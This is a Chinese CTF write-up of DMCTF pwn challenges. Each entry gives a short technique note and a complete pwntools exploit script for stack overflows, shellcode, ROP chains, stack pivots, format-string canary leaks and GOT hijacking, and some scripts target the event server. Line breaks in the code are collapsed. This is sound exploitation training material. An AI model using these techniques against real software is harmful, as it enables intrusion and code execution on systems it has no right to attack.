以下题均请注意glibc版本问题
intoverflow 整数溢出绕过,跳转到后门函数
exp:
from pwn import *p=process('./intoverflow' ) system_addr = 0x8048645 p.recvuntil("Now,we need a password" ) payload = 'a' * 0x15 + 'b' * 4 + p32(system_addr) payload += 'a' * (261 - len (payload)) p.send(payload) p.interactive()
stackoverflow 栈溢出跳转至后门函数
exp:
from pwn import *system_addr = 0x4006ba p = process('./stackoverflow' ) p.recvuntil('Welcome to DMCTF,please input your name!' ) payload = 'a' * 0x10 + 'b' * 8 + p64(system_addr) p.sendline(payload) p.interactive()
shellcode 程序泄露buf地址,发送shellcode,跳转到shellcode执行
exp:
from pwn import *p =process('./shellcode' ) context.log_level = 'DEBUG' context.arch = 'amd64' ret_addr = int (p.recvline()[0 :14 ],16 ) shellcode = asm(shellcraft.amd64.sh()) print hex (ret_addr)payload = shellcode payload += 'a' * (0x90 +8 -len (shellcode)) payload += p64(ret_addr) p.sendline(payload) p.interactive()
Admin Panel 利用整数溢出突破输入长度限制进行栈溢出。
exp:
from pwn import *s = lambda data: p.send(str (data)) sa = lambda delim,data: p.sendafter(delim,str (data)) sl = lambda data: p.sendline(str (data)) sla = lambda delim,data: p.sendlineafter(delim,str (data)) r = lambda num=4096 : p.recv(num) ru = lambda delims,drop=True : p.recvuntil(delims,drop) uu64 = lambda data: u64(data.ljust(8 ,'\0' )) leak = lambda name,addr: log.success('{} = {:#x}' .format (name, addr)) binary = './admin_panel' context.binary = binary elf = ELF(binary,checksec=False ) p = process(binary) sla('Username: ' , 'merc' ) payload = flat('a' *(0x19 +4 ), 0x804864b ).ljust(260 , 'a' ) sla('Password: ' , payload) p.interactive()
shutup 利用栈溢出调用 read 读取 shellcode 到 bss 段,最后跳转到 bss 段执行 shellcode。
exp:
from pwn import *s = lambda data: p.send(str (data)) sa = lambda delim,data: p.sendafter(delim,str (data)) sl = lambda data: p.sendline(str (data)) sla = lambda delim,data: p.sendlineafter(delim,str (data)) r = lambda num=4096 : p.recv(num) ru = lambda delims,drop=True : p.recvuntil(delims,drop) uu64 = lambda data: u64(data.ljust(8 ,'\0' )) leak = lambda name,addr: log.success('{} = {:#x}' .format (name, addr)) context.log_level = 'DEBUG' binary = './shutup' context.binary = binary elf = ELF(binary,checksec=False ) p = process(binary) pop3 = 0x8048539 s(flat('a' *(0x18 +4 ), elf.plt['read' ], pop3, 0 , elf.bss(), 0x100 , elf.bss())) s(asm(shellcraft.sh())) p.interactive()
babystack 简单的rop链构造
exp:
from pwn import *from LibcSearcher import *context.log_level='debug' if args['REMOTE' ]: p = remote('dmctf.vaala.cloud' ,28182 ) else : p = process("./babystack" ) def main (): elf=ELF('./babystack' ) pop_rbp_ret=0x0000000000400520 pop_rdi_ret=0x0000000000400663 write_plt=elf.plt['write' ] libc_start_main_got=elf.got['__libc_start_main' ] p.recvuntil("PWNME,PWNME,PWMME!!!\n" ) main=0x00000000004005B6 rsi_r15_ret=0x0000000000400661 payload1='a' *0x18 +p64(pop_rdi_ret)+p64(1 )+p64(rsi_r15_ret)+p64(libc_start_main_got)+p64(0 )+p64(write_plt)+p64(main) p.sendline(payload1) libc_start_main_add=u64(p.recv(6 ).ljust(8 ,"\x00" )) print "libc_start_main_add=" +hex (libc_start_main_add) libc=LibcSearcher('__libc_start_main' ,libc_start_main_add) libc_base=libc_start_main_add-libc.dump('__libc_start_main' ) system_addr=libc_base+libc.dump('system' ) bin_addr=libc_base+libc.dump('str_bin_sh' ) print ("system_addr = " +hex (system_addr)) print ("bin_addr = " +hex (bin_addr)) p.recv() payload2='a' *0x10 +'a' *8 +p64(pop_rdi_ret)+p64(bin_addr)+p64(system_addr) p.sendline(payload2) p.interactive() if __name__ == '__main__' : main()
easyStack 简单的栈迁移(libc为2.27)
exp:
from pwn import *context.terminal = ['tmux' , 'splitw' , '-h' ] context(arch = 'amd64' , os = 'linux' , log_level='debug' ) p = remote("dmctf.vaala.cloud" , 28382 ) elf = ELF('./pwn' ) pwn_addr = 0x4006AE pop_rdi = 0x0000000000400803 pop_rsi_ret = 0x0000000000400801 leave_ret = 0x000000000040071f one = 0x601160 two = 0x601060 if __name__ == "__main__" : payload = p64(two) + p64(pop_rdi) + p64(elf.got['puts' ]) + p64(elf.plt['puts' ]) + p64(leave_ret) p.sendafter('name?' , payload) payload = p64(one) + p64(pop_rdi) + p64(0 ) + p64(pop_rsi_ret) + p64(one + 8 ) + p64(0 ) + p64(elf.plt['read' ]) + p64(leave_ret) p.sendafter('something?' , payload) payload = 'a' * 0x10 + p64(one) + '\x1f' p.sendafter('Bye?' , payload) leak = u64(p.recvuntil('\x7f' )[-6 :].ljust(8 , '\x00' )) libc_base = leak - 0x80aa0 success('PUTS: ' + str (hex (leak))) success('LIBC: ' + str (hex (libc_base))) og = [0x4f3d5 , 0x4f432 , 0x10a41c ] payload = p64(og[2 ] + libc_base) p.send(payload) p.interactive()
flag_shop 配合 work 和 buy 功能将钱数降至 0,这样就能构造出包含 $0; 的字符串,然后用寄存器传参把 $0 给 system 调用即可。
exp:
from pwn import *s = lambda data: p.send(str (data)) sa = lambda delim,data: p.sendafter(delim,str (data)) sl = lambda data: p.sendline(str (data)) sla = lambda delim,data: p.sendlineafter(delim,str (data)) r = lambda num=4096 : p.recv(num) ru = lambda delims,drop=True : p.recvuntil(delims,drop) uu64 = lambda data: u64(data.ljust(8 ,'\0' )) leak = lambda name,addr: log.success('{} = {:#x}' .format (name, addr)) binary = './flag_shop' context.binary = binary elf = ELF(binary,checksec=False ) p = process(binary) sla('Exit\n' , '5' ) ru('have $' ) money = int (r(1 )) sla('[yes/no]' , 'yes' ) money += 1 times = money / 2 for i in range (times): sla('Exit\n' , '1' ) sla('[yes/no]' , 'yes' ) msg = 0x602080 pop_rdi = 0x400e03 sla('Exit\n' , '1' ) payload = flat('a' *(0x50 +8 ), pop_rdi, msg+15 , elf.plt['system' ]) sla('[yes/no]' , payload) sl('6' ) p.interactive()
马大师的绝招 格式化字符串漏洞和栈溢出。
格式化字符串漏洞可以泄露canary和libc地址,栈溢出劫持执行流。
exp:
from pwn import * context.log_level="debug" local=0 if local: p=process("pwn-end" ) libc=ELF("/lib/x86_64-linux-gnu/libc.so.6" ) else :p=remote("" ,0 ) libc=ELF("/lib/x86_64-linux-gnu/libc.so.6" ) def get_int (content ): content=int (content,16 ) out=hex (content) print("content to int end is : " ,out) return content def get_formate_result (spli="0x" ,length=12 ): info=p.recvuntil("0x" ,drop="true" ) info=info[0 :length] print("leak info (may set a and b to get real info) : " ,info) return info p.recvuntil("!!!!!!!\n" ) p.send("%21$p%15$p" ) info=get_formate_result() info=get_formate_result() libc.address=get_int(info)-0x20840 info=p.recv(16 ) canary=get_int(info) p.recvuntil("flag!!!\n" ) payload="a" *0x38 +p64(canary)+p64(canary)+p64(0x00000000004008f3 )+p64(libc.search("/bin/sh" ).next ())+p64(libc.symbols["system" ]) p.sendline(payload) p.interactive()
接化发 利用任意地址写泄露 libc 并进行 GOT 劫持。
exp:
from pwn import *s = lambda data: p.send(str (data)) sa = lambda delim,data: p.sendafter(delim,str (data)) sl = lambda data: p.sendline(str (data)) sla = lambda delim,data: p.sendlineafter(delim,str (data)) r = lambda num=4096 : p.recv(num) ru = lambda delims,drop=True : p.recvuntil(delims,drop) uu64 = lambda data: u64(data.ljust(8 ,'\0' )) leak = lambda name,addr: log.success('{} = {:#x}' .format (name, addr)) binary = './pwn' context.binary = binary elf = ELF(binary,checksec=False ) libc = ELF('./libc-2.23.so' , checksec=False ) p = process(binary, env={'LD_PRELOAD' : './libc-2.23.so' }) sla(':' , '/bin/sh;' ) attack = 0x602120 stdin = 0x6020b0 printf = elf.got['printf' ] for i in range (attack-stdin): ru('>\n' ) sl('2' ) addr = '' for i in range (6 ): ru('>\n' ) sl('5' ) addr += r(1 ) ru('>\n' ) sl('1' ) addr = uu64(addr) leak('stdin' , addr) base = addr - libc.sym['_IO_2_1_stdin_' ] leak('base' , base) system = p64(base + libc.sym['system' ]) for i in range (stdin-printf+6 ): ru('>\n' ) sl('2' ) for i in range (5 ): ru('>\n' ) sl('6' ) s(system[i]) ru('>\n' ) sl('1' ) ru('>\n' ) sl('6' ) s(system[5 ]) sl('7' ) p.interactive()
